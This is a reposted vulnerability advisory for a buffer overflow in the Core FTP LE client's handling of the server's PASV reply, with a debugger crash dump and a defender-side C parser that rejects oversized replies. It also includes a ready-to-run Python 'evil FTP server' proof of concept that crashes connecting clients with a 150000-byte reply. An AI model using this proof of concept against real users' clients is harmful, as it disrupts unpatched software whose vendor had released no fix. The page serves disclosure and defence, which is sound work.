Core FTP LE Response Handling Buffer Overflow Vulnerability (2)

User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0        nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b            mov    ecx,dword ptr [ebx]  ds:0023:41414141=????????
0:002> dd eax
00f1bbf0  41414141 41414141 41414141 41414141
00f1bc00  41414141 41414141 41414141 41414141
00f1bc10  41414141 41414141 41414141 41414141
00f1bc20  41414141 41414141 41414141 41414141
00f1bc30  41414141 41414141 41414141 41414141
00f1bc40  41414141 41414141 41414141 41414141
00f1bc50  41414141 41414141 41414141 41414141
00f1bc60  41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8  41414141 41414141 41414141 41414141
00f1bbf8  41414141 41414141 41414141 41414141
00f1bc08  41414141 41414141 41414141 41414141
00f1bc18  41414141 41414141 41414141 41414141
00f1bc28  41414141 41414141 41414141 41414141
00f1bc38  41414141 41414141 41414141 41414141
00f1bc48  41414141 41414141 41414141 41414141
00f1bc58  41414141 41414141 41414141 41414141

#!/usr/bin/env python3
# PoC server: answers the client's PASV command with an oversized "227" reply.

import errno
from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR, error

host = "0.0.0.0"
port = 21
payload = b"A" * 150000   # 150000 x 'A' (0x41): the 41414141 values in the crash dump

s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(1)

print("[+] Evil FTP Server started")
print("[+] Listening on port %d..." % port)

conn, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])
# Walk the client through a minimal login so that it goes on to issue PASV.
conn.send(b"220 Welcome to Evil FTP Server\r\n")
conn.recv(1024)  # Receive USER
conn.send(b"331 Need password for whatever user\r\n")
conn.recv(1024)  # Receive PASS
conn.send(b"230 User logged in\r\n")
conn.recv(1024)  # Receive SYST
conn.send(b"215 UNIX Type: L8\r\n")
conn.recv(1024)  # Receive PWD
conn.send(b"257 \"/\" is current directory\r\n")

try:
    print("[+] Sending evil response for 'PASV' command...")
    conn.recv(1024)  # Receive PASV
    conn.sendall(b"227 " + payload + b"\r\n")   # sendall: the reply is far larger than one send()
    conn.recv(1024)
except error as e:
    # ECONNRESET is 10054 (WSAECONNRESET) on Windows and 104 on Linux.
    if e.errno == errno.ECONNRESET:
        print("[+] Client crashed!")
    else:
        print(e)
finally:
    conn.close()
    s.close()
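The crash above comes from the client copying a server reply it never length-checked. As an added, defender-side illustration (not Core FTP's code and not part of the original advisory), the following C parser handles a "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply with an explicit size limit and field validation, so a reply like the PoC's "227 " followed by 150000 bytes of 'A' is rejected before anything is copied. The limit FTP_REPLY_MAX, the struct and the function names are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Longest control-channel reply we are willing to buffer (assumed limit). */
#define FTP_REPLY_MAX 512

typedef struct {
    unsigned char ip[4];
    unsigned short port;
} pasv_addr_t;

/* Parse a 227 PASV reply of known length into *out.
   Returns 0 on success, -1 for an oversized or malformed reply. */
int parse_pasv_reply(const char *reply, size_t reply_len, pasv_addr_t *out)
{
    char buf[FTP_REPLY_MAX];

    /* Refuse anything the fixed buffer cannot hold instead of copying blindly. */
    if (reply == NULL || out == NULL || reply_len >= sizeof(buf))
        return -1;
    memcpy(buf, reply, reply_len);
    buf[reply_len] = '\0';

    /* Reply code must be exactly "227" followed by a space or a hyphen. */
    if (strncmp(buf, "227", 3) != 0 || (buf[3] != ' ' && buf[3] != '-'))
        return -1;

    const char *lparen = strchr(buf, '(');
    if (lparen == NULL)
        return -1;

    /* Six comma-separated decimal fields, each 0..255, closed by ')'. */
    const char *p = lparen + 1;
    unsigned long vals[6];
    for (int i = 0; i < 6; i++) {
        char *end;
        if (*p < '0' || *p > '9')        /* strtoul would also accept signs/whitespace */
            return -1;
        errno = 0;
        vals[i] = strtoul(p, &end, 10);
        if (errno != 0 || vals[i] > 255)
            return -1;
        p = end;
        if (i < 5) {
            if (*p != ',')
                return -1;
            p++;
        }
    }
    if (*p != ')')
        return -1;

    for (int i = 0; i < 4; i++)
        out->ip[i] = (unsigned char)vals[i];
    out->port = (unsigned short)(vals[4] * 256 + vals[5]);
    return 0;
}

/* Convenience wrapper for NUL-terminated replies. */
int parse_pasv_reply_str(const char *reply, pasv_addr_t *out)
{
    return parse_pasv_reply(reply, strlen(reply), out);
}

/* Builds a reply shaped like the PoC's ("227 " + n x 'A') and reports
   whether the parser rejects it. Returns 1 if rejected, 0 otherwise. */
int oversized_reply_is_rejected(size_t n)
{
    char *reply = malloc(n + 4 + 1);
    if (reply == NULL)
        return 0;
    memcpy(reply, "227 ", 4);
    memset(reply + 4, 'A', n);
    reply[n + 4] = '\0';

    pasv_addr_t a;
    int rc = parse_pasv_reply_str(reply, &a);
    free(reply);
    return rc == -1;
}

int main(void)
{
    pasv_addr_t a;
    if (parse_pasv_reply_str("227 Entering Passive Mode (192,168,1,10,4,1)", &a) == 0)
        printf("PASV target %u.%u.%u.%u:%u\n", a.ip[0], a.ip[1], a.ip[2], a.ip[3], a.port);
    printf("150000-byte reply rejected: %s\n",
           oversized_reply_is_rejected(150000) ? "yes" : "no");
    return 0;
}
```

The design point is that the size check happens on the length of the received line, before any copy into the fixed buffer, and every field is range-checked rather than trusted; a client written this way turns the PoC's reply into a protocol error instead of a crash.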

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Core FTP
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:


Content copyright notice: unless otherwise stated, all articles are original to this site.

When reposting, credit the source: http://www.heiqu.com/b4478f77a69b9b82f6801556924d32e4.html